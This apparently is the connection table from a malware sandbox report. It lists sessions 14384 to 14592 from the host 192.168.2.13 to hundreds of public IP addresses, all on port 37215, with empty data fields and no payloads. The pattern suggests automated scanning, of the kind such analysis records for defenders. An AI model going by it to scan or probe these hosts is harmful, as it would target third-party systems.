                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14384192.168.2.1341624197.249.215.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14385192.168.2.1348216157.82.62.21837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14386192.168.2.134594041.33.118.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14387192.168.2.133457041.98.27.21037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14388192.168.2.134703641.97.193.6837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14389192.168.2.134970841.250.28.24437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14390192.168.2.1351486197.77.224.2137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14391192.168.2.134811218.145.112.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14392192.168.2.135019241.60.133.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14393192.168.2.1334842171.111.130.14337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14394192.168.2.135512484.213.224.25037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14395192.168.2.135092641.135.213.25337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14396192.168.2.133545227.16.0.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14397192.168.2.135352676.213.133.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14398192.168.2.1340230196.182.66.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14399192.168.2.1349324197.96.44.15437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14400192.168.2.1335536157.96.118.21237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14401192.168.2.133393841.217.249.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14402192.168.2.133478041.61.150.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14403192.168.2.135994441.18.0.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14404192.168.2.1350812197.87.193.14437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14405192.168.2.1335212157.206.38.16937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14406192.168.2.135810441.71.253.16837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14407192.168.2.1333446157.232.204.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14408192.168.2.135911641.108.171.20337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14409192.168.2.1359820197.17.109.4437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14410192.168.2.1352088197.11.69.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14411192.168.2.135511841.83.224.9337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14412192.168.2.1357980107.131.71.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14413192.168.2.1353152197.54.168.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14414192.168.2.1344222197.112.236.10537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14415192.168.2.1333202157.199.240.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14416192.168.2.1348758197.252.149.6437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14417192.168.2.1356016157.142.234.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14418192.168.2.1352312190.105.23.12037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14419192.168.2.1338740197.164.111.19237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14420192.168.2.135309041.102.161.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14421192.168.2.133512041.146.13.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14422192.168.2.1336518197.60.207.3837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14423192.168.2.135734841.6.140.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14424192.168.2.1346576157.251.206.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14425192.168.2.1338414157.46.163.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14426192.168.2.134039641.233.167.15637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14427192.168.2.1347980182.161.60.21437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14428192.168.2.1358872197.248.160.4837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14429192.168.2.1346648157.222.176.21637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14430192.168.2.1359096197.35.85.1237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14431192.168.2.134310441.110.82.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14432192.168.2.1350730197.192.117.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14433192.168.2.1346162184.188.239.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14434192.168.2.133824254.1.200.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14435192.168.2.1337302189.201.21.16237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14436192.168.2.1357162157.255.162.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14437192.168.2.1345604144.194.86.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14438192.168.2.1344110197.245.73.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14439192.168.2.1359668212.152.12.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14440192.168.2.1347732157.151.127.18537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14441192.168.2.134212841.103.3.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14442192.168.2.1337686157.201.225.18237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14443192.168.2.1342962157.13.151.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14444192.168.2.1343052128.161.139.6937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14445192.168.2.1340424197.250.247.13237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14446192.168.2.1348936157.26.116.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14447192.168.2.1358876197.157.245.2837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14448192.168.2.1336302157.172.132.25437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14449192.168.2.1349798157.47.205.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14450192.168.2.13461722.40.187.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14451192.168.2.1343906157.219.31.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14452192.168.2.1358326174.113.157.7837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14453192.168.2.1341558197.124.104.24937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14454192.168.2.1340874197.85.11.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14455192.168.2.1356518197.84.103.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14456192.168.2.135920441.200.7.24137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14457192.168.2.135141441.130.45.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14458192.168.2.133540241.178.38.20637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14459192.168.2.133527041.246.60.2037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14460192.168.2.135775841.65.72.137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14461192.168.2.1345180157.130.240.3937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14462192.168.2.1356210157.30.35.18737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14463192.168.2.1336422157.138.152.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14464192.168.2.134406018.42.169.12137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14465192.168.2.1352332151.59.93.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14466192.168.2.1351360197.225.253.937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14467192.168.2.1360318157.164.52.7237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14468192.168.2.135121441.181.222.15037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14469192.168.2.133793641.72.99.19937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14470192.168.2.135907441.204.23.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14471192.168.2.1334494157.20.140.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14472192.168.2.1347040157.118.175.20937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14473192.168.2.1351568117.115.128.18937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14474192.168.2.134330641.28.130.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14475192.168.2.133996841.146.52.15337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14476192.168.2.1333714157.24.97.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14477192.168.2.135130470.85.69.20237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14478192.168.2.1345644137.114.15.17737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14479192.168.2.133655841.168.15.3637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14480192.168.2.135263441.24.198.8637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14481192.168.2.1337344197.93.44.14037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14482192.168.2.13404209.230.111.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14483192.168.2.134410641.44.252.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14484192.168.2.134283878.138.94.11537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14485192.168.2.1352338197.205.176.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14486192.168.2.1351492117.254.143.8937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14487192.168.2.13340164.14.153.25537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14488192.168.2.1355164197.169.137.25237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14489192.168.2.1344866157.182.115.10037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14490192.168.2.135643441.77.184.6537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14491192.168.2.134645041.227.76.15537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14492192.168.2.133443241.87.161.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14493192.168.2.1349104157.29.134.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14494192.168.2.1335918157.188.100.17637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14495192.168.2.1352508165.223.57.18637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14496192.168.2.135581295.250.142.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14497192.168.2.1340578157.191.219.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14498192.168.2.1355508197.73.240.11437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14499192.168.2.134855441.27.44.9037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14500192.168.2.1342650157.69.111.5537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14501192.168.2.1343828157.151.93.17937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14502192.168.2.1339260157.131.123.2937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14503192.168.2.1358258213.251.129.22437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14504192.168.2.1351776197.27.172.15137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14505192.168.2.1340842197.210.78.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14506192.168.2.1344048197.4.149.1437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14507192.168.2.1359944157.175.220.13537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14508192.168.2.1346106197.49.179.20737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14509192.168.2.1335330197.225.223.20137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14510192.168.2.1354246197.84.207.16737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14511192.168.2.1354942197.128.140.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14512192.168.2.13431225.223.80.18437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14513192.168.2.1355508197.39.198.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14514192.168.2.1356518115.36.120.5437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14515192.168.2.1338874157.79.43.20537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14516192.168.2.1336518197.171.34.3237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14517192.168.2.134299241.3.82.037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14518192.168.2.1335318157.201.75.2537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14519192.168.2.1345836157.253.65.10637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14520192.168.2.136032041.143.212.1737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14521192.168.2.1337182197.131.218.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14522192.168.2.1352850157.40.41.19337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14523192.168.2.134059641.184.2.237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14524192.168.2.134610241.19.191.8837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14525192.168.2.133500841.120.148.22537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14526192.168.2.135045441.201.208.23637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14527192.168.2.1350486197.12.52.1637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14528192.168.2.1340874217.186.62.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14529192.168.2.1346946157.245.9.12937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14530192.168.2.134347241.117.71.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14531192.168.2.1348374197.181.184.19037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14532192.168.2.1347052157.194.119.7537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14533192.168.2.134254441.47.105.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14534192.168.2.1348646157.62.191.8237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14535192.168.2.1347118102.130.236.4937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14536192.168.2.1337110197.52.171.1037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14537192.168.2.134943641.197.216.8137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14538192.168.2.1337648187.31.12.18337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14539192.168.2.1338642157.169.93.12237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14540192.168.2.1333630157.245.65.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14541192.168.2.1334598197.115.99.22337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14542192.168.2.135580254.62.231.9737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14543192.168.2.1348606132.10.252.16137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14544192.168.2.1338450197.127.151.21937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14545192.168.2.1341968157.27.78.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14546192.168.2.134011241.153.111.16437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14547192.168.2.133392261.45.5.22637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14548192.168.2.134188641.0.225.17437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14549192.168.2.133569844.253.207.13037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14550192.168.2.1350366197.173.27.11037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14551192.168.2.134258292.231.49.23237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14552192.168.2.1333066157.223.144.17537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14553192.168.2.1355174157.30.85.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14554192.168.2.1341422197.131.56.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14555192.168.2.1341336102.12.36.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14556192.168.2.134220841.7.33.23037215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14557192.168.2.1337238197.111.143.4237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14558192.168.2.1360692197.9.158.23937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14559192.168.2.1352880197.129.25.15937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14560192.168.2.133597441.138.72.6137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14561192.168.2.1337148157.75.55.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14562192.168.2.1341182197.114.225.1137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14563192.168.2.1337826154.250.208.437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14564192.168.2.133713441.237.255.6337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14565192.168.2.1338978157.17.102.15837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14566192.168.2.1350120157.162.11.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14567192.168.2.1351128157.51.181.17337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14568192.168.2.1352276191.116.48.22137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14569192.168.2.135720224.58.158.13437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14570192.168.2.1342334197.177.203.19137215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14571192.168.2.1354942100.163.183.14737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14572192.168.2.1357972145.214.96.5737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14573192.168.2.1338498197.184.156.14537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14574192.168.2.135011041.204.54.3537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14575192.168.2.133543241.90.75.10937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14576192.168.2.134100241.47.35.24837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14577192.168.2.136052660.55.73.23737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14578192.168.2.1348552157.151.205.15237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14579192.168.2.1358040157.220.49.20837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14580192.168.2.1349294205.114.21.21337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14581192.168.2.1333824197.10.211.9837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14582192.168.2.1355420157.29.86.9537215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14583192.168.2.135774241.104.71.12837215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14584192.168.2.1359186157.21.241.3337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14585192.168.2.1343570206.159.255.14937215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14586192.168.2.136067467.67.212.2237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14587192.168.2.1360668157.106.212.13337215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14588192.168.2.1360852157.20.143.7637215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14589192.168.2.135996641.195.203.5237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14590192.168.2.133979841.56.13.11737215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14591192.168.2.1354284157.150.213.3437215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  14592192.168.2.1338642157.146.231.14237215
                                                  TimestampBytes transferredDirectionData


                                                  Session IDSource IPSource PortDestination IPDestination Port
